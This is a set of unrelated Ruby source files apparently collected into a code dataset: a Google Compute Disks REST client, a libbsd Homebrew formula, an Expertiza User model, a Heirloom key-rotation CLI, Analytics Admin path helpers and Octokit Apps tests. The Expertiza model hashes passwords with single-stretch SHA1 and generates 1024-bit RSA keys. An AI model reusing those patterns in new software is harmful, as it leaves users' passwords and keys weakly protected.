request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::SetIamPolicyDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_set_iam_policy request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Policy.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Sets the labels on a disk. To learn more about labels, read the Labeling Resources documentation.
#
# @overload set_labels(request, options = nil)
# Pass arguments to `set_labels` via a request object, either of type
# {::Google::Cloud::Compute::V1::SetLabelsDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::SetLabelsDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload set_labels(project: nil, request_id: nil, resource: nil, zone: nil, zone_set_labels_request_resource: nil)
# Pass arguments to `set_labels` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param resource [::String]
# Name or id of the resource for this request.
# @param zone [::String]
# The name of the zone for this request.
# @param zone_set_labels_request_resource [::Google::Cloud::Compute::V1::ZoneSetLabelsRequest, ::Hash]
# The body resource for this request
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def set_labels request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::SetLabelsDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_set_labels request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Returns permissions that a caller has on the specified resource.
#
# @overload test_iam_permissions(request, options = nil)
# Pass arguments to `test_iam_permissions` via a request object, either of type
# {::Google::Cloud::Compute::V1::TestIamPermissionsDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::TestIamPermissionsDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload test_iam_permissions(project: nil, resource: nil, test_permissions_request_resource: nil, zone: nil)
# Pass arguments to `test_iam_permissions` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param resource [::String]
# Name or id of the resource for this request.
# @param test_permissions_request_resource [::Google::Cloud::Compute::V1::TestPermissionsRequest, ::Hash]
# The body resource for this request
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::TestPermissionsResponse]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::TestPermissionsResponse]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def test_iam_permissions request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::TestIamPermissionsDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_test_iam_permissions request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::TestPermissionsResponse.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Configuration class for the Disks REST API.
#
# This class represents the configuration for Disks REST,
# providing control over credentials, timeouts, retry behavior, logging.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# # Examples
#
# To modify the global config, setting the timeout for all calls to 10 seconds:
#
# ::Google::Cloud::Compute::V1::Disks::Client.configure do |config|
# config.timeout = 10.0
# end
#
# To apply the above configuration only to a new client:
#
# client = ::Google::Cloud::Compute::V1::Disks::Client.new do |config|
# config.timeout = 10.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"compute.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "compute.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr :timeout, nil, ::Numeric, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
end
end
end
end
end
end
end
end
| 60.299239 | 477 | 0.580761 |
872862a01c2bebea64693a438d72e07e3d0eb9d7 | 586 | class Libbsd < Formula
desc "Utility functions from BSD systems"
homepage "https://libbsd.freedesktop.org/"
url "https://libbsd.freedesktop.org/releases/libbsd-0.11.3.tar.xz"
sha256 "ff95cf8184151dacae4247832f8d4ea8800fa127dbd15033ecfe839f285b42a1"
license "BSD-3-Clause"
depends_on "libmd"
depends_on :linux
def install
system "./configure",
"--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}"
system "make", "install"
end
test do
assert_match "strtonum", shell_output("nm #{lib/"libbsd.so"}")
end
end
| 25.478261 | 75 | 0.699659 |
62aad48a3e5bcf2a4f842abb3c25c6683fbff71c | 10,334 | class User < ActiveRecord::Base
acts_as_authentic do |config|
config.validates_uniqueness_of_email_field_options = {if: -> { false }} # Don't validate email uniqueness
config.crypto_provider = Authlogic::CryptoProviders::Sha1
Authlogic::CryptoProviders::Sha1.join_token = ''
Authlogic::CryptoProviders::Sha1.stretches = 1
end
has_many :participants, class_name: 'Participant', foreign_key: 'user_id', dependent: :destroy
has_many :assignment_participants, class_name: 'AssignmentParticipant', foreign_key: 'user_id', dependent: :destroy
has_many :assignments, through: :participants
has_many :teams_users, dependent: :destroy
has_many :teams, through: :teams_users
has_many :bids, dependent: :destroy
has_many :sent_invitations, class_name: 'Invitation', foreign_key: 'from_id', dependent: :destroy
has_many :received_invitations, class_name: 'Invitation', foreign_key: 'to_id', dependent: :destroy
has_many :children, class_name: 'User', foreign_key: 'parent_id'
has_many :track_notifications, dependent: :destroy
belongs_to :parent, class_name: 'User'
belongs_to :role
validates :name, presence: true
validates :name, uniqueness: true
validates :email, presence: {message: "can't be blank"}
validates :email, format: {with: /\A[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\z/i, allow_blank: true}
before_validation :randomize_password, if: ->(user) { user.new_record? && user.password.blank? } # AuthLogic
after_create :email_welcome
scope :superadministrators, -> { where role_id: Role.superadministrator }
scope :superadmins, -> { superadministrators }
scope :administrators, -> { where role_id: Role.administrator }
scope :admins, -> { administrators }
scope :instructors, -> { where role_id: Role.instructor }
scope :tas, -> { where role_id: Role.ta }
scope :students, -> { where role_id: Role.student }
has_paper_trail
def salt_first?
true
end
def list_mine(object_type, user_id)
object_type.where(["instructor_id = ?", user_id])
end
def get_available_users(name)
lesser_roles = role.get_parents
all_users = User.all(conditions: ['name LIKE ?', "#{name}%"], limit: 20) # higher limit, since we're filtering
visible_users = all_users.select {|user| lesser_roles.include? user.role }
visible_users[0, 10] # the first 10
end
def can_impersonate?(user)
return true if self.role.super_admin?
return true if self.teaching_assistant_for?(user)
return true if self.recursively_parent_of(user)
false
end
def recursively_parent_of(user)
p = user.parent
return false if p.nil?
return true if p == self
return false if p.role.super_admin?
self.recursively_parent_of(p)
end
def get_user_list
user_list = []
# If the user is a super admin, fetch all users
user_list = SuperAdministrator.get_user_list if self.role.super_admin?
# If the user is an instructor, fetch all users in his course/assignment
user_list = Instructor.get_user_list(self) if self.role.instructor?
# If the user is a TA, fetch all users in his courses
user_list = Ta.get_user_list(self) if self.role.ta?
# Add the children to the list
unless self.role.super_admin?
User.all.find_each do |u|
if recursively_parent_of(u)
user_list << u unless user_list.include?(u)
end
end
end
user_list.uniq
end
# Zhewei: anonymized view for demo purposes - 1/3/2018
def self.anonymized_view?(ip_address = nil)
anonymized_view_starter_ips = $redis.get('anonymized_view_starter_ips') || ''
return true if ip_address and anonymized_view_starter_ips.include? ip_address
false
end
def name(ip_address = nil)
User.anonymized_view?(ip_address) ? self.role.name + ' ' + self.id.to_s : self[:name]
end
def fullname(ip_address = nil)
User.anonymized_view?(ip_address) ? self.role.name + ', ' + self.id.to_s : self[:fullname]
end
def first_name(ip_address = nil)
User.anonymized_view?(ip_address) ? self.role.name : fullname.try(:[], /,.+/).try(:[], /\w+/) || ''
end
def email(ip_address = nil)
User.anonymized_view?(ip_address) ? self.role.name + '_' + self.id.to_s + '@mailinator.com' : self[:email]
end
def super_admin?
role.name == 'Super-Administrator'
end
delegate :admin?, to: :role
delegate :student?, to: :role
def creator_of?(user)
self == user.creator
end
# Function which has a MailerHelper which sends the mail welcome email to the user after signing up
def email_welcome
MailerHelper.send_mail_to_user(self, "Your Expertiza password has been created", "user_welcome", password)
end
def valid_password?(password)
Authlogic::CryptoProviders::Sha1.stretches = 1
Authlogic::CryptoProviders::Sha1.matches?(crypted_password, self.password_salt.to_s + password)
end
# Resets the password to be mailed to the user
def reset_password
randomize_password
save
password
end
def self.import(row_hash, _row_header, session, id = nil)
raise ArgumentError, "Only #{row_hash.length} column(s) is(are) found. It must contain at least username, full name, email." if row_hash.length < 3
user = User.find_by_name(row_hash[:name])
if user.nil?
attributes = ImportFileHelper.define_attributes(row_hash)
user = ImportFileHelper.create_new_user(attributes, session)
password = user.reset_password
MailerHelper.send_mail_to_user(user, "Your Expertiza account has been created.", "user_welcome", password).deliver
else
user.email = row_hash[:email]
user.fullname = row_hash[:fullname]
user.parent_id = (session[:user]).id
user.save
end
end
def self.yesorno(elt)
if elt == true
"yes"
elsif elt == false
"no"
else
""
end
end
# locate User based on provided login.
# If user supplies e-mail or name, the
# helper will try to find that User account.
def self.find_by_login(login)
user = User.find_by(email: login)
if user.nil?
items = login.split("@")
shortName = items[0]
userList = User.where("name = ?", shortName)
user = userList.first if !userList.nil? && userList.length == 1
end
user
end
def set_instructor(new_assignment)
new_assignment.instructor_id = self.id
end
def get_instructor
self.id
end
def instructor_id
case role.name
when 'Super-Administrator' then id
when 'Administrator' then id
when 'Instructor' then id
when 'Teaching Assistant' then Ta.get_my_instructor(id)
else raise NotImplementedError, "for role #{role.name}"
end
end
# generate a new RSA public/private key pair and create our own X509 digital certificate which we
# save in the database. The private key is returned by the method but not saved.
def generate_keys
# check if we are replacing a digital certificate already generated
replacing_key = true unless self.digital_certificate.nil?
# generate the new key pair
new_key = OpenSSL::PKey::RSA.generate(1024)
self.public_key = new_key.public_key.to_pem
save
# when replacing an existing key, update any digital signatures made previously with the new key
if replacing_key
participants = AssignmentParticipant.where(user_id: self.id)
for participant in participants
AssignmentParticipant.grant_publishing_rights(new_key.to_pem, [participant]) if participant.permission_granted
end
end
# return the new private key
new_key.to_pem
end
def initialize(attributes = nil)
super(attributes)
Authlogic::CryptoProviders::Sha1.stretches = 1
@email_on_review = true
@email_on_submission = true
@email_on_review_of_review = true
@copy_of_emails = false
end
def self.export(csv, _parent_id, options)
users = User.all
users.each do |user|
tcsv = []
tcsv.push(user.name, user.fullname, user.email) if options["personal_details"] == "true"
tcsv.push(user.role.name) if options["role"] == "true"
tcsv.push(user.parent.name) if options["parent"] == "true"
tcsv.push(user.email_on_submission, user.email_on_review, user.email_on_review_of_review, user.copy_of_emails) if options["email_options"] == "true"
tcsv.push(user.handle) if options["handle"] == "true"
csv << tcsv
end
end
def creator
parent
end
def self.export_fields(options)
fields = []
fields.push("name", "full name", "email") if options["personal_details"] == "true"
fields.push("role") if options["role"] == "true"
fields.push("parent") if options["parent"] == "true"
fields.push("email on submission", "email on review", "email on metareview") if options["email_options"] == "true"
fields.push("handle") if options["handle"] == "true"
fields
end
def self.from_params(params)
user = if params[:user_id]
User.find(params[:user_id])
else
User.find_by name: params[:user][:name]
end
if user.nil?
newuser = url_for controller: 'users', action: 'new'
raise "Please <a href='#{newuser}'>create an account</a> for this user to continue."
end
user
end
def teaching_assistant_for?(student)
return false unless teaching_assistant?
return false if student.role.name != 'Student'
# We have to use the Ta object instead of User object
# because single table inheritance is not currently functioning
ta = Ta.find(id)
return true if ta.courses_assisted_with.any? do |c|
c.assignments.map(&:participants).flatten.map(&:user_id).include? student.id
end
end
def teaching_assistant?
return true if self.role.ta?
end
def self.search_users(role, user_id, letter, search_by)
key_word = {'1' => 'name', '2' => 'fullname', '3' => 'email'}
sql = "(role_id in (?) or id = ?) and #{key_word[search_by]} like ?"
if key_word.include? search_by
search_filter = '%' + letter + '%'
users = User.order('name').where(sql, role.get_available_roles, user_id, search_filter)
else # default used when clicking on letters
search_filter = letter + '%'
users = User.order('name').where("(role_id in (?) or id = ?) and name like ?", role.get_available_roles, user_id, search_filter)
end
users
end
end
| 33.993421 | 154 | 0.692471 |
33c24c7588440c0552907d90610c8787d4596e6b | 3,315 | module Heirloom
module CLI
class Rotate
include Heirloom::CLI::Shared
def self.command_summary
'Rotate keys for an Heirloom'
end
def initialize
@opts = read_options
@logger = HeirloomLogger.new :log_level => @opts[:level]
@config = load_config :logger => @logger,
:opts => @opts
ensure_valid_options :provided => @opts,
:required => [:name, :id, :old_secret, :new_secret],
:config => @config
@catalog = Heirloom::Catalog.new :name => @opts[:name],
:config => @config
@archive = Archive.new :name => @opts[:name],
:config => @config,
:id => @opts[:id]
unless @opts[:bucket_prefix]
ensure_archive_exists :archive => @archive,
:config => @config
end
# Lookup upload regions, metadata region, and bucket_prefix from simpledb unless specified
@opts[:regions] ||= @catalog.regions
@opts[:region] ||= @catalog.regions.first
@opts[:bucket_prefix] ||= @catalog.bucket_prefix
end
def rotate
@archive.rotate @opts
rescue Heirloom::Exceptions::RotateFailed => e
@config.logger.error e.message
exit 1
end
private
def read_options
Trollop::options do
version Heirloom::VERSION
banner <<-EOS
#{Rotate.command_summary}.
Will download the heirloom to temp directory, decrypt, encrypt, and upload, replacing original.
Usage:
heirloom rotate -n NAME -i ID --new-secret MY_NEW_SECRET --old-secret MY_OLD_SECRET
To rotate Heirloom without looking up details in SimpleDB, specify region (-r) and bucket_prefix (-b) options.
EOS
opt :bucket_prefix, "Bucket prefix of the Heirloom to download.", :type => :string
opt :help, "Display Help"
opt :id, "ID of the Heirloom to rotate.", :type => :string
opt :level, "Log level [debug|info|warn|error].", :type => :string,
:default => 'info'
opt :metadata_region, "AWS region to store Heirloom metadata.", :type => :string
opt :name, "Name of Heirloom.", :type => :string
opt :region, "Region to download Heirloom.", :type => :string,
:default => 'us-west-1'
opt :new_secret, "New Secret for encrypted Heirloom.", :type => :string,
:short => :none
opt :old_secret, "Old secret for encrypted Heirloom.", :type => :string,
:short => :none
opt :aws_access_key, "AWS Access Key ID", :type => :string,
:short => :none
opt :aws_secret_key, "AWS Secret Access Key", :type => :string,
:short => :none
opt :environment, "Environment (defined in heirloom config)", :type => :string
end
end
end
end
end
| 38.103448 | 110 | 0.505581 |
0375c4428f064aab2a4fb37d9e97bae62803334d | 11,335 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Analytics
module Admin
module V1alpha
module AnalyticsAdminService
# Path helper methods for the AnalyticsAdminService API.
module Paths
##
# Create a fully-qualified Account resource string.
#
# The resource will be in the following format:
#
# `accounts/{account}`
#
# @param account [String]
#
# @return [::String]
def account_path account:
"accounts/#{account}"
end
##
# Create a fully-qualified ConversionEvent resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/conversionEvents/{conversion_event}`
#
# @param property [String]
# @param conversion_event [String]
#
# @return [::String]
def conversion_event_path property:, conversion_event:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/conversionEvents/#{conversion_event}"
end
##
# Create a fully-qualified CustomDimension resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/customDimensions`
#
# @param property [String]
#
# @return [::String]
def custom_dimension_path property:
"properties/#{property}/customDimensions"
end
##
# Create a fully-qualified CustomMetric resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/customMetrics`
#
# @param property [String]
#
# @return [::String]
def custom_metric_path property:
"properties/#{property}/customMetrics"
end
##
# Create a fully-qualified DataRetentionSettings resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/dataRetentionSettings`
#
# @param property [String]
#
# @return [::String]
def data_retention_settings_path property:
"properties/#{property}/dataRetentionSettings"
end
##
# Create a fully-qualified DataSharingSettings resource string.
#
# The resource will be in the following format:
#
# `accounts/{account}/dataSharingSettings`
#
# @param account [String]
#
# @return [::String]
def data_sharing_settings_path account:
"accounts/#{account}/dataSharingSettings"
end
##
# Create a fully-qualified DataStream resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/dataStreams/{data_stream}`
#
# @param property [String]
# @param data_stream [String]
#
# @return [::String]
def data_stream_path property:, data_stream:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/dataStreams/#{data_stream}"
end
##
# Create a fully-qualified DisplayVideo360AdvertiserLink resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/displayVideo360AdvertiserLinks/{display_video_360_advertiser_link}`
#
# @param property [String]
# @param display_video_360_advertiser_link [String]
#
# @return [::String]
def display_video360_advertiser_link_path property:, display_video_360_advertiser_link:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/displayVideo360AdvertiserLinks/#{display_video_360_advertiser_link}"
end
##
# Create a fully-qualified DisplayVideo360AdvertiserLinkProposal resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/displayVideo360AdvertiserLinkProposals/{display_video_360_advertiser_link_proposal}`
#
# @param property [String]
# @param display_video_360_advertiser_link_proposal [String]
#
# @return [::String]
def display_video360_advertiser_link_proposal_path property:, display_video_360_advertiser_link_proposal:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/displayVideo360AdvertiserLinkProposals/#{display_video_360_advertiser_link_proposal}"
end
##
# Create a fully-qualified FirebaseLink resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/firebaseLinks/{firebase_link}`
#
# @param property [String]
# @param firebase_link [String]
#
# @return [::String]
def firebase_link_path property:, firebase_link:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/firebaseLinks/#{firebase_link}"
end
##
# Create a fully-qualified GlobalSiteTag resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/dataStreams/{data_stream}/globalSiteTag`
#
# @param property [String]
# @param data_stream [String]
#
# @return [::String]
def global_site_tag_path property:, data_stream:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/dataStreams/#{data_stream}/globalSiteTag"
end
##
# Create a fully-qualified GoogleAdsLink resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/googleAdsLinks/{google_ads_link}`
#
# @param property [String]
# @param google_ads_link [String]
#
# @return [::String]
def google_ads_link_path property:, google_ads_link:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/googleAdsLinks/#{google_ads_link}"
end
##
# Create a fully-qualified GoogleSignalsSettings resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/googleSignalsSettings`
#
# @param property [String]
#
# @return [::String]
def google_signals_settings_path property:
"properties/#{property}/googleSignalsSettings"
end
##
# Create a fully-qualified MeasurementProtocolSecret resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/dataStreams/{data_stream}/measurementProtocolSecrets/{measurement_protocol_secret}`
#
# @param property [String]
# @param data_stream [String]
# @param measurement_protocol_secret [String]
#
# @return [::String]
def measurement_protocol_secret_path property:, data_stream:, measurement_protocol_secret:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
raise ::ArgumentError, "data_stream cannot contain /" if data_stream.to_s.include? "/"
"properties/#{property}/dataStreams/#{data_stream}/measurementProtocolSecrets/#{measurement_protocol_secret}"
end
##
# Create a fully-qualified Property resource string.
#
# The resource will be in the following format:
#
# `properties/{property}`
#
# @param property [String]
#
# @return [::String]
def property_path property:
"properties/#{property}"
end
##
# Create a fully-qualified UserLink resource string.
#
# @overload user_link_path(account:, user_link:)
# The resource will be in the following format:
#
# `accounts/{account}/userLinks/{user_link}`
#
# @param account [String]
# @param user_link [String]
#
# @overload user_link_path(property:, user_link:)
# The resource will be in the following format:
#
# `properties/{property}/userLinks/{user_link}`
#
# @param property [String]
# @param user_link [String]
#
# @return [::String]
def user_link_path **args
resources = {
"account:user_link" => (proc do |account:, user_link:|
raise ::ArgumentError, "account cannot contain /" if account.to_s.include? "/"
"accounts/#{account}/userLinks/#{user_link}"
end),
"property:user_link" => (proc do |property:, user_link:|
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/userLinks/#{user_link}"
end)
}
resource = resources[args.keys.sort.join(":")]
raise ::ArgumentError, "no resource found for values #{args.keys}" if resource.nil?
resource.call(**args)
end
extend self
end
end
end
end
end
end
| 36.682848 | 123 | 0.550243 |
e2bedae09bae22b4745cff21fe956018876ec858 | 421 | class User < ActiveRecord::Base
# Include default devise modules.
# notice that :omniauthable is not included in this block
# notice that :confirmable is not included in this block
devise :database_authenticatable, :registerable,
:recoverable, :rememberable, :trackable, :validatable
# note that this include statement comes AFTER the devise block above
include DeviseTokenAuth::Concerns::User
end
| 38.272727 | 71 | 0.764846 |
11671c65fc6ff1b7fcef30e8ed636637eee44a54 | 15,113 | require 'helper'
describe Octokit::Client::Apps do
before(:each) do
Octokit.reset!
@client = oauth_client
@jwt_client = Octokit::Client.new(:bearer_token => new_jwt_token)
use_vcr_placeholder_for(@jwt_client.bearer_token, '<JWT_BEARER_TOKEN>')
end
after(:each) do
Octokit.reset!
end
describe ".app", :vcr do
it "returns current App" do
response = @jwt_client.app()
expect(response.id).not_to be_nil
assert_requested :get, github_url("/app")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/app")
response = client.app()
assert_requested request
end
end
describe ".find_integration_installations", :vcr do
it "returns installations for an integration" do
allow(@jwt_client).to receive(:octokit_warn)
installations = @jwt_client.find_integration_installations
expect(installations).to be_kind_of Array
assert_requested :get, github_url("/app/installations")
expect(@jwt_client).to have_received(:octokit_warn).with(/Deprecated/)
end
end # .find_integration_installations
describe ".find_app_installations", :vcr do
it "returns installations for an app" do
installations = @jwt_client.find_app_installations()
expect(installations).to be_kind_of Array
assert_requested :get, github_url("/app/installations")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/app/installations")
response = client.find_app_installations()
assert_requested request
end
end # .find_app_installations
describe ".find_user_installations", :vcr do
it "returns installations for a user" do
response = @client.find_user_installations()
expect(response.total_count).not_to be_nil
expect(response.installations).to be_kind_of(Array)
assert_requested :get, github_url("/user/installations")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/user/installations")
response = client.find_user_installations()
assert_requested request
end
it "allows auto_pagination", :vcr do
@client.auto_paginate = true
response = @client.find_user_installations(per_page: 1)
expect(response.total_count).to eq 2
expect(response.installations.count).to eq 2
expect(response.installations).to be_kind_of(Array)
end
end # .find_user_installations
describe ".find_organization_installation", :vcr do
let(:organization) { test_github_org }
it "returns installation for an organization" do
response = @jwt_client.find_organization_installation(organization)
expect(response.id).not_to be_nil
expect(response.target_type).to eq("Organization")
assert_requested :get, github_url("/orgs/#{organization}/installation")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/organizations/1234/installation")
response = client.find_organization_installation(1234)
assert_requested request
end
it "allows auto_pagination" do
@jwt_client.auto_paginate = true
response = @jwt_client.find_organization_installation(organization, per_page: 1)
expect(response.id).not_to be_nil
expect(response.target_type).to eq("Organization")
end
end # .find_organization_installation
describe ".find_repository_installation", :vcr do
it "returns installation for an repository" do
response = @jwt_client.find_repository_installation(@test_org_repo)
expect(response.id).not_to be_nil
expect(response.target_type).to eq("Organization")
assert_requested :get, github_url("/repos/#{@test_org_repo}/installation")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/repos/testing/1234/installation")
response = client.find_repository_installation('testing/1234')
assert_requested request
end
it "allows auto_pagination" do
@jwt_client.auto_paginate = true
response = @jwt_client.find_repository_installation(@test_org_repo, per_page: 1)
expect(response.id).not_to be_nil
expect(response.target_type).to eq("Organization")
end
end # .find_repository_installation
describe ".find_user_installation", :vcr do
let(:user) { test_github_login }
it "returns installation for a user" do
response = @jwt_client.find_user_installation(user)
expect(response.id).not_to be_nil
expect(response.account.login).to eq(user)
assert_requested :get, github_url("/users/#{user}/installation")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/users/1234/installation")
response = client.find_user_installation('1234')
assert_requested request
end
it "allows auto_pagination" do
@jwt_client.auto_paginate = true
response = @jwt_client.find_user_installation(user, per_page: 1)
expect(response.id).not_to be_nil
expect(response.account.login).to eq(user)
end
end # .find_user_installation
context "with app installation", :vcr do
let(:installation) { test_github_integration_installation }
describe ".installation" do
it "returns the installation" do
response = @jwt_client.installation(installation)
expect(response).to be_kind_of Sawyer::Resource
assert_requested :get, github_url("/app/installations/#{installation}")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
